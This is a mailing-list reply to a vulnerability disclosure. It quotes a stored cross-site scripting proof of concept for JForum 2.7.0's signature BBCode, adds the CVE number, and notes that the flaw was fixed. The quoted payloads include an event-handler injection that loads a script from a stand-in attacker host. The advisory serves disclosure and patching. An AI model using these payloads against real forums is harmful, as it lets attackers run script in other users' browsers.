Full Disclosure mailing list archives
Re: a xss vulnerability in Jforum 2.7.0
From: Henri Salo <henri () nerv fi>
Date: Tue, 7 Sep 2021 10:44:43 +0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:
hi, I found a vulnerability in the jforum 2.7.0. It is a storage cross site script vulnerability. The place is the user's profile - signature. The technique of the vulnerability is the same as that described in this article "STORED CROSS SITE SCRIPTING IN BBCODE" ( https://mindedsecurity.com/advisories/msa130510/), and the POC is: color tag: [color=red" onMouseOver="alert('xss')]XSS[/color] [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js') ;"]XSS[/color] Renders into HTML: <font onmouseover="alert('xss')" color="red">XSS</font> <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" color="red">XSS</font> img tag: [img]/demo.jpg" onMouseOver="alert('xss')[/img] Renders into HTML: <img src="/demo.jpg" onmouseover="alert('xss')" alt="image"> url= tag: [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url] Renders into HTML: <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" target="_blank">test</a> through analysis, the forum has set the cookie to http-only, but the attacker can use the $.getScript to do some evil things. this vulnerability has been fixed in https://sourceforge.net/p/jforum2/code/934/ . timeline: 2021-04-21 announce the developer of Jforum by e-mail 2021-04-22 Jforum fixed the vulnerability, and will include this fix in next release 2021-09-02 send this mail to bugtraq&fulldisclosure
CVE-2021-40509 has been assigned for this vulnerability. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509 - -- Henri Salo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAmE3GGgACgkQJ633pE6q dXRbUA//fgeWQCIQzYDgZ6venNplzRBsCamTVWK2miur4NjIqKFtza4namiEn1GK 9+Fw4llZdmcdLV2iE5HVo1EPwg1RKgKqEFWlat8cLNWyzPFazh3Mv8gJgAAPnfgB HdODZGE8cXnTZ2nK1FZqTtGbh7vTcs9AlWzpEwZgZs+BzWzX6VO/gxC2iQcA4ePq 6/xKsUbO46SKZpZ+pZt45V9r4EcibgU69cXwtPeywE2NRjlM9VsReWz+p3CVR3Sv px6mK3G4sjyHyPIhkDwVMwUziPT5FfLuAPYI6VEweMsCUgyUfj48xu+pmTYwCQ1R 8LSjllEU2qsGvs0oMGs7AEp5T1c/kDP7xgS761gUivjl1J//szu+QScC0jKYVdEX DWp672UpzB3F4xsMTeQu7U7zq+NRS2ySNs3gB2cvqsjS8lDIMdrnThqZny/K7jhC TCrfTYDTsej1jlMWR3mTiFIhNNhPPoSg+Opab1wnqQwO3JIE9xVqNNTsyIH+aCMK jUlZZAbJwfb3WNJMJHI+9gxh1XgLf5NhgsSlzSpWcnM/soXOYzi3EdYlvuc0cTQ7 X3082dHC7A2Y1Lm9fTqvwsQ+BGV0rR8FxhwAfqweNz7AH5rAIbalj+mVFweSaUU/ k2Vd4Jt8QjfmzaTMMpLxUPjA3vlaIBxYnz/T33chZ119PRG9vNc= =fWS4 -----END PGP SIGNATURE----- _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- a xss vulnerability in Jforum 2.7.0 kun song (Sep 03)
- Re: a xss vulnerability in Jforum 2.7.0 Henri Salo (Sep 07)